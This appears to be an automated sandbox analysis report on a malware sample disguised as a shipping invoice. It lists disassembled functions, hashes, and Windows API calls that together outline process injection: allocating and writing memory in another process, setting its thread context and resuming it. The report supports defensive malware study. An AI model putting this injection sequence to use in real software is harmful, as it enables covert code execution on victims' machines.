                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42db5f70280d43338e97d9a5760c9ebbf1be37520337cc6af09f12f93ccb09ad
                                            • Instruction ID: 459ac17e520dfbfe9110cd04eaabef7279c32078abeecdef40f9bb2548962071
                                            • Opcode Fuzzy Hash: 42db5f70280d43338e97d9a5760c9ebbf1be37520337cc6af09f12f93ccb09ad
                                            • Instruction Fuzzy Hash: D121B2B0D046189BEB18CFABC9457EEBEF6BFC9300F04C16AD409A62A4DB7409468F50
                                            Function 0AB2EA02 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 ab2ea02-ab2ea09 1 ab2ea26-ab2ea3d 0->1 2 ab2ea0b 0->2 3 ab2ea12-ab2ea17 1->3 8 ab2ea3f-ab2ea58 1->8 2->3 5 ab2ea22-ab2ea25 3->5 5->1 11 ab2ede4-ab2ee06 call ab2fdd8 8->11 16 ab2eda0-ab2edb1 11->16 16->11
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: E4'r$Q"
                                            • API String ID: 0-2437235950
                                            • Opcode ID: a0f78701d0a94738d2a28a8c87ad5d9bdc880dfacc33f848f406fee0ba63a54c
                                            • Instruction ID: 8b00e7136401f2f27b842ea757164e6ccc78539d110860430a30a5c68e99af46
                                            • Opcode Fuzzy Hash: a0f78701d0a94738d2a28a8c87ad5d9bdc880dfacc33f848f406fee0ba63a54c
                                            • Instruction Fuzzy Hash: 7111EE70904629DFDB00EFA8C8845AD7FB6FB84340B10A65AE507EF389EA309C02DB40
                                            Function 04A52314 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 19 4a52314-4a523b5 21 4a523b7-4a523c1 19->21 22 4a523ee-4a5240e 19->22 21->22 23 4a523c3-4a523c5 21->23 29 4a52447-4a52476 22->29 30 4a52410-4a5241a 22->30 24 4a523c7-4a523d1 23->24 25 4a523e8-4a523eb 23->25 27 4a523d5-4a523e4 24->27 28 4a523d3 24->28 25->22 27->27 31 4a523e6 27->31 28->27 38 4a524af-4a52569 CreateProcessA 29->38 39 4a52478-4a52482 29->39 30->29 32 4a5241c-4a5241e 30->32 31->25 34 4a52441-4a52444 32->34 35 4a52420-4a5242a 32->35 34->29 36 4a5242c 35->36 37 4a5242e-4a5243d 35->37 36->37 37->37 40 4a5243f 37->40 50 4a52572-4a525f8 38->50 51 4a5256b-4a52571 38->51 39->38 41 4a52484-4a52486 39->41 40->34 43 4a524a9-4a524ac 41->43 44 4a52488-4a52492 41->44 43->38 45 4a52494 44->45 46 4a52496-4a524a5 44->46 45->46 46->46 48 4a524a7 46->48 48->43 61 4a52608-4a5260c 50->61 62 4a525fa-4a525fe 50->62 51->50 64 4a5261c-4a52620 61->64 65 4a5260e-4a52612 61->65 62->61 63 4a52600 62->63 63->61 67 4a52630-4a52634 64->67 68 4a52622-4a52626 64->68 65->64 66 4a52614 65->66 66->64 70 4a52646-4a5264d 67->70 71 4a52636-4a5263c 67->71 68->67 69 4a52628 68->69 69->67 72 4a52664 70->72 73 4a5264f-4a5265e 70->73 71->70 75 4a52665 72->75 73->72 75->75
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04A52556
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 895732fe1fe48972aba2c0c4d8433576f77372789de134c7c2929122a39e3125
                                            • Instruction ID: 1309f3f1a9b04f70f0b1011bc45266eb20c3b692248bf97ac0a916cb32e1478e
                                            • Opcode Fuzzy Hash: 895732fe1fe48972aba2c0c4d8433576f77372789de134c7c2929122a39e3125
                                            • Instruction Fuzzy Hash: 5BA14A72D002599FEF24CF68C9417EEBBB2FF48314F1485A9E809A7250DB74A985CF91
                                            Function 04A52320 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 76 4a52320-4a523b5 78 4a523b7-4a523c1 76->78 79 4a523ee-4a5240e 76->79 78->79 80 4a523c3-4a523c5 78->80 86 4a52447-4a52476 79->86 87 4a52410-4a5241a 79->87 81 4a523c7-4a523d1 80->81 82 4a523e8-4a523eb 80->82 84 4a523d5-4a523e4 81->84 85 4a523d3 81->85 82->79 84->84 88 4a523e6 84->88 85->84 95 4a524af-4a52569 CreateProcessA 86->95 96 4a52478-4a52482 86->96 87->86 89 4a5241c-4a5241e 87->89 88->82 91 4a52441-4a52444 89->91 92 4a52420-4a5242a 89->92 91->86 93 4a5242c 92->93 94 4a5242e-4a5243d 92->94 93->94 94->94 97 4a5243f 94->97 107 4a52572-4a525f8 95->107 108 4a5256b-4a52571 95->108 96->95 98 4a52484-4a52486 96->98 97->91 100 4a524a9-4a524ac 98->100 101 4a52488-4a52492 98->101 100->95 102 4a52494 101->102 103 4a52496-4a524a5 101->103 102->103 103->103 105 4a524a7 103->105 105->100 118 4a52608-4a5260c 107->118 119 4a525fa-4a525fe 107->119 108->107 121 4a5261c-4a52620 118->121 122 4a5260e-4a52612 118->122 119->118 120 4a52600 119->120 120->118 124 4a52630-4a52634 121->124 125 4a52622-4a52626 121->125 122->121 123 4a52614 122->123 123->121 127 4a52646-4a5264d 124->127 128 4a52636-4a5263c 124->128 125->124 126 4a52628 125->126 126->124 129 4a52664 127->129 130 4a5264f-4a5265e 127->130 128->127 132 4a52665 129->132 130->129 132->132
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04A52556
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 7ccbc9d567ebf83ba93fb58f212a75f96e42c8809f2aac23a695adeedf02dae8
                                            • Instruction ID: 5d1bd0a3a88f593df63daddb6a21a0411882126ead993afb987ac19d3448065b
                                            • Opcode Fuzzy Hash: 7ccbc9d567ebf83ba93fb58f212a75f96e42c8809f2aac23a695adeedf02dae8
                                            • Instruction Fuzzy Hash: B5914B72D002199FEF24CF69C9417EEBBB2BF48314F1485A9E809A7250DB74A985CF91
                                            Function 00E8AE79 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 133 e8ae79-e8ae97 134 e8ae99-e8aea6 call e8a1e0 133->134 135 e8aec3-e8aec7 133->135 141 e8aea8 134->141 142 e8aebc 134->142 137 e8aec9-e8aed3 135->137 138 e8aedb-e8af1c 135->138 137->138 144 e8af29-e8af37 138->144 145 e8af1e-e8af26 138->145 188 e8aeae call e8b120 141->188 189 e8aeae call e8b111 141->189 142->135 146 e8af39-e8af3e 144->146 147 e8af5b-e8af5d 144->147 145->144 149 e8af49 146->149 150 e8af40-e8af47 call e8a1ec 146->150 152 e8af60-e8af67 147->152 148 e8aeb4-e8aeb6 148->142 151 e8aff8-e8b0b8 148->151 154 e8af4b-e8af59 149->154 150->154 183 e8b0ba-e8b0bd 151->183 184 e8b0c0-e8b0eb GetModuleHandleW 151->184 155 e8af69-e8af71 152->155 156 e8af74-e8af7b 152->156 154->152 155->156 159 e8af88-e8af91 call e8a1fc 156->159 160 e8af7d-e8af85 156->160 164 e8af9e-e8afa3 159->164 165 e8af93-e8af9b 159->165 160->159 166 e8afc1-e8afce 164->166 167 e8afa5-e8afac 164->167 165->164 174 e8afd0-e8afee 166->174 175 e8aff1-e8aff7 166->175 167->166 169 e8afae-e8afbe call e8a20c call e8a21c 167->169 169->166 174->175 183->184 185 e8b0ed-e8b0f3 184->185 186 e8b0f4-e8b108 184->186 185->186 188->148 189->148
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E8B0DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 467553be5187d241c522d592e021f7cf6484d3fb741515f966dac57fd16f3e79
                                            • Instruction ID: a8d2607ebc035c3fdd36fb8caf051fa7a4cb3cb0af824faaf39dd541f2a48675
                                            • Opcode Fuzzy Hash: 467553be5187d241c522d592e021f7cf6484d3fb741515f966dac57fd16f3e79
                                            • Instruction Fuzzy Hash: 158179B0A00B458FE724EF2AD04575ABBF1FF88304F14892EE14AE7A50DB74E945CB91
                                            Function 00E85A84 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 190 e85a84-e85b14
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df702668b1b8ba4fba9793750907ab1b008526e55688f561bca0a08c3cde0101
                                            • Instruction ID: 39d5ad193304453652486ba2c223ec64d4822e5aa08477023f8fba12917dcea6
                                            • Opcode Fuzzy Hash: df702668b1b8ba4fba9793750907ab1b008526e55688f561bca0a08c3cde0101
                                            • Instruction Fuzzy Hash: 4141DD76805B48CFDB21EBA8C8853EDBBF0EF86314F24918AC05DAB251CB759946CB11
                                            Function 00E8590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 193 e8590c-e8598c 195 e8598f-e859d9 CreateActCtxA 193->195 197 e859db-e859e1 195->197 198 e859e2-e85a3c 195->198 197->198 205 e85a4b-e85a4f 198->205 206 e85a3e-e85a41 198->206 207 e85a60 205->207 208 e85a51-e85a5d 205->208 206->205 209 e85a61 207->209 208->207 209->209
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E859C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 70faf670b88a58404fb59fec9874f2c3ae87aca3024843e8aff951ca0cb428d3
                                            • Instruction ID: 27a8249321dadff0ae43153fc40b785becc9f9ed624595373284870773f4983d
                                            • Opcode Fuzzy Hash: 70faf670b88a58404fb59fec9874f2c3ae87aca3024843e8aff951ca0cb428d3
                                            • Instruction Fuzzy Hash: 1541D071C00719CBEB24DFA9C9847DEBBB1BF88704F20815AD408AB251DBB5694ACF90
                                            Function 00E844E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 211 e844e4-e859d9 CreateActCtxA 215 e859db-e859e1 211->215 216 e859e2-e85a3c 211->216 215->216 223 e85a4b-e85a4f 216->223 224 e85a3e-e85a41 216->224 225 e85a60 223->225 226 e85a51-e85a5d 223->226 224->223 227 e85a61 225->227 226->225 227->227
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E859C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 2615e72d4485e130c1396d1cf21dd2f2c998f484da67703a8dae51c6bcf7e767
                                            • Instruction ID: cb1af6b2b6230fca93439b9345807c9773ef9a166fd864df6a7f77e97ab7e7b8
                                            • Opcode Fuzzy Hash: 2615e72d4485e130c1396d1cf21dd2f2c998f484da67703a8dae51c6bcf7e767
                                            • Instruction Fuzzy Hash: 7541C071C0071DCBEB24DFA9C98479EBBF5BF88704F20816AD408AB251DBB56946CF90
                                            Function 04A52090 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 229 4a52090-4a520e6 232 4a520f6-4a52135 WriteProcessMemory 229->232 233 4a520e8-4a520f4 229->233 235 4a52137-4a5213d 232->235 236 4a5213e-4a5216e 232->236 233->232 235->236
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04A52128
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 33af0a7cbe94da77425b94f83e568b49e48eefc4c8968fb72b5e384d675e6f16
                                            • Instruction ID: eb95ed4acc55c8b74126fd79a8841bbe7aec681ab0b79b4cffb99594b5bc6025
                                            • Opcode Fuzzy Hash: 33af0a7cbe94da77425b94f83e568b49e48eefc4c8968fb72b5e384d675e6f16
                                            • Instruction Fuzzy Hash: EF2159719003099FDB10CFAAC981BDEBBF5FF48310F108429E918A7240D7789940CBA4
                                            Function 04A52098 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 240 4a52098-4a520e6 242 4a520f6-4a52135 WriteProcessMemory 240->242 243 4a520e8-4a520f4 240->243 245 4a52137-4a5213d 242->245 246 4a5213e-4a5216e 242->246 243->242 245->246
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04A52128
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 88d0f95bfbc0ee8fc720523f105b1f4e6f865ca8135a4bbaa755b82ce33a167b
                                            • Instruction ID: c3daee33eaa4574a00701d2cb4b36ba2557f2ce6737ce20f4c9aef2c9fe3cd24
                                            • Opcode Fuzzy Hash: 88d0f95bfbc0ee8fc720523f105b1f4e6f865ca8135a4bbaa755b82ce33a167b
                                            • Instruction Fuzzy Hash: 002146729003499FDF10CFAAC981BDEBBF5FF48310F108429E918A7240D778A950CBA4
                                            Function 04A51EF9 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 250 4a51ef9-4a51f4b 253 4a51f4d-4a51f59 250->253 254 4a51f5b-4a51f8b Wow64SetThreadContext 250->254 253->254 256 4a51f94-4a51fc4 254->256 257 4a51f8d-4a51f93 254->257 257->256
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04A51F7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: b8d5c471555c07aef2eac30434548ddeb3a4958f77d46b9457e944e3403904e6
                                            • Instruction ID: bbafe54fefefa707cfdcf10ddd64b1d03729e308a528cc095c8ca3a92a1253d3
                                            • Opcode Fuzzy Hash: b8d5c471555c07aef2eac30434548ddeb3a4958f77d46b9457e944e3403904e6
                                            • Instruction Fuzzy Hash: 0A213A71D003099FDB10DFAAC5857EEBBF4EF88324F14842AD519A7240DB78A944CFA5
                                            Function 04A52180 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 261 4a52180-4a52215 ReadProcessMemory 265 4a52217-4a5221d 261->265 266 4a5221e-4a5224e 261->266 265->266
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04A52208
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 4dab4907800788ce8429949748a233c8c94db593c34ec71cbc93a09035990241
                                            • Instruction ID: b4757a5101708051dc2e8296e39d2f78f5318cf23aa2b8c40691361d7819af8d
                                            • Opcode Fuzzy Hash: 4dab4907800788ce8429949748a233c8c94db593c34ec71cbc93a09035990241
                                            • Instruction Fuzzy Hash: 6D2139B18003499FDB10CFAAC981BEEBBF5FF48310F508429E918A7240D7789910CBA5
                                            Function 00E8B870 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 270 e8b870-e8d7f4 DuplicateHandle 272 e8d7fd-e8d81a 270->272 273 e8d7f6-e8d7fc 270->273 273->272
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8D726,?,?,?,?,?), ref: 00E8D7E7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 1ec9e92c722d45d0e90e656fc0cde80a83d292874decbec6042c54bac8738349
                                            • Instruction ID: ff86254e8ca22705e7cebe8154cf839ab0a4188ef2742d25be0d2a930ef1b3f6
                                            • Opcode Fuzzy Hash: 1ec9e92c722d45d0e90e656fc0cde80a83d292874decbec6042c54bac8738349
                                            • Instruction Fuzzy Hash: 5721E5B5904209DFDB10DF9AD984ADEBBF4EB48720F14841AE918B3350D375A954CFA4
                                            Function 04A51F00 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 276 4a51f00-4a51f4b 278 4a51f4d-4a51f59 276->278 279 4a51f5b-4a51f8b Wow64SetThreadContext 276->279 278->279 281 4a51f94-4a51fc4 279->281 282 4a51f8d-4a51f93 279->282 282->281
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04A51F7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 02ca2189ec7238863416c226fe460851de7fbe9c316a7ebdbfb2be19b07c31db
                                            • Instruction ID: 2077d47c4097f1393a40148936f24f76e82020d69a1139d8e30c04bbcd704146
                                            • Opcode Fuzzy Hash: 02ca2189ec7238863416c226fe460851de7fbe9c316a7ebdbfb2be19b07c31db
                                            • Instruction Fuzzy Hash: A6215871D003099FDB10DFAAC5857EEBBF4EF88324F14842AD919A7240DB78A944CFA5
                                            Function 04A52188 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 286 4a52188-4a52215 ReadProcessMemory 289 4a52217-4a5221d 286->289 290 4a5221e-4a5224e 286->290 289->290
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04A52208
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 19de8f5cc7ca976b48ae0dcea66d311e7c61da3750579190cd456feec5b219f3
                                            • Instruction ID: 9b9e02d96fc3f436ad18fc582c90669ea046519f8d8735fff32de93e320d55b5
                                            • Opcode Fuzzy Hash: 19de8f5cc7ca976b48ae0dcea66d311e7c61da3750579190cd456feec5b219f3
                                            • Instruction Fuzzy Hash: 752128718003499FDB10CFAAC981BDEBBF5FF48320F508429E919A7250D779A910CBA5
                                            Function 00E8D759 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 294 e8d759-e8d7f4 DuplicateHandle 295 e8d7fd-e8d81a 294->295 296 e8d7f6-e8d7fc 294->296 296->295
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8D726,?,?,?,?,?), ref: 00E8D7E7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 6b73f2f61620136f3728c4c499ff5103bf569bfcac30aa31190aef347e2e4d9b
                                            • Instruction ID: 9470eb63f9af6c4c8c32c3ce7b4798d195588d01d9f6299719bfcb270c23f471
                                            • Opcode Fuzzy Hash: 6b73f2f61620136f3728c4c499ff5103bf569bfcac30aa31190aef347e2e4d9b
                                            • Instruction Fuzzy Hash: 7021E2B5900349DFDB10CFA9D980ADEBBF5FB48324F24841AE918B3250C379AA54CF64
                                            Function 00E8A248 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E8B159,00000800,00000000,00000000), ref: 00E8B36A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 211244742a109ac08047bc6a68aa5aff51f487690cb0be0f9fe2ba75917191ad
                                            • Instruction ID: 5a692e8bc31204343b1e0c0697742275be842880190ec654422537800def99f7
                                            • Opcode Fuzzy Hash: 211244742a109ac08047bc6a68aa5aff51f487690cb0be0f9fe2ba75917191ad
                                            • Instruction Fuzzy Hash: 701117B68003098FDB10DF9AD444BDEFBF4EB88714F10841AD519B7210C3B9A945CFA5
                                            Function 04A51FD0 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04A52046
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 70ea6103c4b430720f09ff0c161b8b228217c926ad1276f598d44b0810d0a0c0
                                            • Instruction ID: cc2567737703e1fcd306853f16ae1f20fb606311b0eda9beaf759a8a56e82280
                                            • Opcode Fuzzy Hash: 70ea6103c4b430720f09ff0c161b8b228217c926ad1276f598d44b0810d0a0c0
                                            • Instruction Fuzzy Hash: 9C1147769002498FDB20CFA9D8447EFBBF1AF88320F148419E519A7250C7759951CFA4
                                            Function 04A51FD8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04A52046
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: f7930c3093f542de818d61e2c2a2532b076ae2a6457e1d46515a1adccf3b5e8e
                                            • Instruction ID: 99f4495b132a6fb46e96eb96e892f3f6dc1bb9bdfefe54dd1add5c2327bf4307
                                            • Opcode Fuzzy Hash: f7930c3093f542de818d61e2c2a2532b076ae2a6457e1d46515a1adccf3b5e8e
                                            • Instruction Fuzzy Hash: 0E1156729003499FDB10DFAAC844BDFBBF5EF88320F208819E519A7250C779A910CFA5
                                            Function 04A51A10 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 3a5ae77a29f93dfeb55dfb613d267f1444404ab8c31380b6a66dc23a2bfe033e
                                            • Instruction ID: 8e99866c7e0a509cee16662e97724ef545f1e9efa409bf3d0ca1604a533d7325
                                            • Opcode Fuzzy Hash: 3a5ae77a29f93dfeb55dfb613d267f1444404ab8c31380b6a66dc23a2bfe033e
                                            • Instruction Fuzzy Hash: 8B1149B1D003498FDB24DFAAC5457AEBBF4EB88724F208419D519A7240DB75A940CBA5
                                            Function 00E8B2F9 Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E8B159,00000800,00000000,00000000), ref: 00E8B36A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
